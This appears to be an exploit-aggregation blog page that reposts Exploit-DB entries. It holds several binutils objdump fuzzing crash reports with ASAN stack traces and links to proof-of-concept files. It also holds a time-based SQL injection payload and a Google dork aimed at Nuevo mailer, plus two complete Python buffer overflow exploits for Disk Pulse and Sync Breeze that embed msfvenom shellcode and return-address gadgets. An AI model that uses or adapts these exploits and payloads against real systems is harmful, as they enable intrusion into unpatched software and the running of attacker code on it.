Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21595
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the ASAN report log ("Output"). Below is the reduced stacktrace with links to the corresponding source lines on a GitHub mirror.
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Let me know if there is any additional information I can provide.
--
Input: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.min
Output: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.txt
Error in "aarch64_ext_ldst_reglist": global-buffer-overflow
in aarch64_ext_ldst_reglist at opcodes/aarch64-dis.c:412
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L412)
in aarch64_opcode_decode at opcodes/aarch64-dis.c:2739
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2739)
in aarch64_decode_insn at opcodes/aarch64-dis.c:2831
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2831)
in print_insn_aarch64_word at opcodes/aarch64-dis.c:2973
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2973)
in print_insn_aarch64 at opcodes/aarch64-dis.c:3209
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L3209)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42204.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582983
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21576
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.min
Output: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.txt
Error in "print_insn_score16": global-buffer-overflow
in print_insn_score16 at opcodes/score7-dis.c:723
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L723)
in s7_print_insn at opcodes/score7-dis.c:954
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L954)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42203.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min
Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt
Error in "ieee_object_p": stack-buffer-overflow
in ieee_object_p at bfd/ieee.c:1985
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985)
in bfd_check_format_matches at bfd/format.c:311
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
in display_object_bfd at binutils/objdump.c:3602
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
in display_any_bfd at binutils/objdump.c:3693
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42202.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min
Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt
Error in "bfd_get_string": stack-buffer-overflow
in bfd_get_string at bfd/ieee.c:198
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198)
in read_id at bfd/ieee.c:227
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227)
in ieee_object_p at bfd/ieee.c:1907
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907)
in bfd_check_format_matches at bfd/format.c:311
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
in display_object_bfd at binutils/objdump.c:3602
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
in display_any_bfd at binutils/objdump.c:3693
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42200.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min
Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt
Error in "decode_pseudodbg_assert_0": global-buffer-overflow
in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604)
in _print_insn_bfin at opcodes/bfin-dis.c:4760
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
in print_insn_bfin at opcodes/bfin-dis.c:4778
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min
Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt
Error in "decode_pseudodbg_assert_0": global-buffer-overflow
in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596)
in _print_insn_bfin at opcodes/bfin-dis.c:4760
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
in print_insn_bfin at opcodes/bfin-dis.c:4778
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42201.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min
Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1993
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min
Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1932
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min
Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1926
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42199.zip
# Exploit Title: Nuevo mailer version <= 6.0 SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and below
# Tested on: Linux
Vulnerable script: rdr.php
Vulnerable parameter: r
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
NB: vendor has been notified.
#!/usr/bin/python
###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################
a = open("exploit.txt", "w")
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + "\x53\x5b" * 107
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()
#!/usr/bin/python
###############################################################################
# Exploit Title: Sync Breeze v9.7.26 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
# Vendor Homepage: http://www.syncbreeze.com
# Version: 9.7.26
# Software Link: http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. click "Add"
# 2. enter any command name
# 3. On new window, scroll down to "Exclude"
# 4. Click "Add Exclude Directory"
# 4. Paste text in exploit.txt into "Directory" field
#
##############################################################################
a = open("exploit.txt", "w")
# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Sync Breeze\bin\QtGui4.dll)
jmpesp = "\x4e\x21\x1f\x65"
badchars = "\x0a\x0d" # And 0x80 to 0xff
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
junk = "C" * (239)
llamaleftovers = (
"\x54" # push ESP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
a.write(data)
a.close()
